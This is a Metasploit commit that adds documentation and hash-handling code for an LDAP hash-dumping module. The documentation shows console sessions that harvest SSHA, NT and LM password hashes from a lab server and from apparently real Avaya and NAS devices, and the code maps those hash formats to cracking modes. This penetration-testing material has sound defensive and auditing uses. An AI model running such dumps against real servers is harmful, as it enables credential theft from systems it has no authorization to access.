parent 1bd4a8d

author Hynek Petrak <[email protected]> 1595628792 +0200
committer Spencer McIntyre <[email protected]> 1598532753 -0400

Added module to dump hashes from LDAP

added hash formatters, documentation, ldap authentication

typo

sanitizing

added scenario for NASDeluxe

added few hash attribute examples

typo correction

Co-authored-by: bcoles <[email protected]>

typo correction

Co-authored-by: bcoles <[email protected]>

typo correction

Co-authored-by: bcoles <[email protected]>

avoid option name conflicts

added test scenario

linted

linted

Dump all nameContexts, not just the first one. Search creds in multiple attributes.

attemt to dump special and operational attributes

check if ldap bind succeeded

sanitize the ldap hashes, skip invalid, remove {crypt} prefix

memory optimization for large LDAP servers

spaces at eols

put header to the ldif loot

added other LDAP hash formats, don't save empty ldif, dump root DSE

now we handle vmdir case too

explictly set md5crypt for $

Converted to scanner to improve performance on large networks

krbprincipalkey, memory optimization for ldap.search

handle additional hash types

be verbose about search errors

added per host timeout

catch exception from Net::Ldap

shorten the param value

handle pwdhistory entries

added comment about sambapwdhistory value

reject shorter empty sambapassordhistory entries

reject null nt and lm hashes

report assumed clear text passwords

refactored timeout for the sake of the loot

ignore {SASL} pass-trough auth entries

distinguish unresolved hashes from clear passwords

print ldap server error message, meaningful loot name

correct exception handling

handle hashes with eol

remove debug line

handle pkcs12 in binary form

attemt to control timeout on bind operation

leave LDAP#bind to be called implicitly in #search

remove debug line

fixed bug, when pillage broke the outer LDAP#search

learning ruby

monkey patched ldap connection handling, ignoring bind errors

commenting the net:LDAP misbehaviour

review fixes

review fixes

moving ldap.search into a function

remove fail_with, store loot from one place, print statistics

linting

consolidated ldap_new and connect, don't catch exceptions in the mixin

Complete the credential creation

Co-authored-by: Spencer McIntyre <[email protected]>

Author: HynekPetrak

documentation/modules/auxiliary/gather/ldap_hashdump.md

@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an LDAP connection to dump data from LDAP server
+using an anonymous or authenticated bind.
+Searching for specific attributes it collects user credentials.
+
+### Setup
+
+Tested in the wild.
+
+You may eventually setup an intentionally insecure OpenLDAP server in docker.
+The below OpenLDAP server does not have any ACL, therefore the hashPassword
+attributes are readable by anonymous clients.
+
+```
+$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
+$ cd bitnami-docker-openldap
+$ docker-compose up -d
+Creating bitnami-docker-openldap_openldap_1 ... done
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
+RPORT => 1389
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   BIND_DN                     no        The username to authenticate to LDAP server
+   BIND_PW                     no        Password for the BIND_DN
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      1389             yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) >
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against 127.0.0.1
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=example,dc=org
+[*] Dumping LDAP data from server at 127.0.0.1:1389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
+[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the LDAP server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USER_ATTR
+
+LDAP attribute to take the user name from. Defaults to DN, however you may
+wish to change it UID, name or similar.
+
+### PASS_ATTR
+
+LDAP attribute to take the password hash from. Defaults to userPassword,
+some LDAP server may use different attribute, e.g. unixUserPassword,
+sambantpassword, sambalmpassword.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf5 > use auxiliary/gather/ldap_hashdump
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      389              yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
+[*] Searching for attribute: userPassword
+[*] Taking uid attribute as username
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
+PASS_ATTR => sambantpassword
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
+[*] Searching for attribute: sambantpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Auxiliary module execution completed
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
+[*] Searching for attribute: sambalmpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
+[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
+[*] Auxiliary module execution completed
+```

lib/metasploit/framework/hashes/identify.rb

@@ -42,6 +42,20 @@ def identify_hash(hash)
       return 'des,crypt'
     when hash =~ /^\$dynamic_82\$[\da-f]{128}\$HEX\$[\da-f]{32}$/ # jtr vmware ldap https://github.com/rapid7/metasploit-framework/pull/13865#issuecomment-660718108
       return 'dynamic_82'
+    when hash.start_with?(/{SSHA}/i)
+      return 'ssha'
+    when hash.start_with?(/{SHA512}/i)
+      return 'raw-sha512'
+    when hash.start_with?(/{SHA}/i)
+      return 'raw-sha1'
+    when hash.start_with?(/{MD5}/i)
+      return 'raw-md5'
+    when hash.start_with?(/{SMD5}/i)
+      return 'smd5'
+    when hash.start_with?(/{SSHA256}/i)
+      return 'ssha256'
+    when hash.start_with?(/{SSHA512}/i)
+      return 'ssha512'
     # windows
     when hash.length == 65 && hash =~ /^[\da-fA-F]{32}:[\da-fA-F]{32}$/ && hash.split(':').first.upcase == 'AAD3B435B51404EEAAD3B435B51404EE'
       return 'nt'

lib/metasploit/framework/password_crackers/cracker.rb

@@ -186,6 +186,20 @@ def jtr_format_to_hashcat_format(format)
             '10200'
           when 'dynamic_82'
             '1710'
+          when 'ssha'
+            '111'
+          when 'raw-sha512'
+            '1700'
+          when 'raw-sha1'
+            '100'
+          when 'raw-md5'
+            '0'
+          when 'smd5'
+            '6300'
+          when 'ssha256'
+            '1411'
+          when 'ssha512'
+            '1711'
           else
             nil
           end

lib/metasploit/framework/password_crackers/hashcat/formatter.rb

@@ -67,7 +67,8 @@ def hash_to_hashcat(cred)
     when /md5|des|bsdi|crypt|bf/, /mssql|mssql05|mssql12|mysql/, /sha256|sha-256/,
          /sha512|sha-512/, /xsha|xsha512|PBKDF2-HMAC-SHA512/,
          /mediawiki|phpass|PBKDF2-HMAC-SHA1/,
-         /android-sha1/, /android-samsung-sha1/, /android-md5/
+         /android-sha1/, /android-samsung-sha1/, /android-md5/,
+         /ssha/, /raw-sha512/
       #            md5(crypt), des(crypt), b(crypt), sha256, sha512, xsha, xsha512, PBKDF2-HMAC-SHA512
       # hash-mode: 500          1500        3200      7400    1800   122   1722       7100
       #            mssql, mssql05, mssql12, mysql, mysql-sha1
@@ -76,6 +77,8 @@ def hash_to_hashcat(cred)
       # hash-mode: 3711,      400,    12001
       #            android-sha1
       # hash-mode: 5800
+      #            ssha, raw-sha512
+      # hash-mode: 111,  1700
       return cred.private.data
     end
   end

lib/metasploit/framework/password_crackers/jtr/formatter.rb

@@ -63,6 +63,8 @@ def hash_to_jtr(cred)
       # /des(crypt)/
       # /mediawiki|phpass|atlassian/
       # /dynamic_82/
+      # /ssha/
+      # /raw-sha512/
       return "#{cred.public.username}:#{cred.private.data}:#{cred.id}:"
     end
   end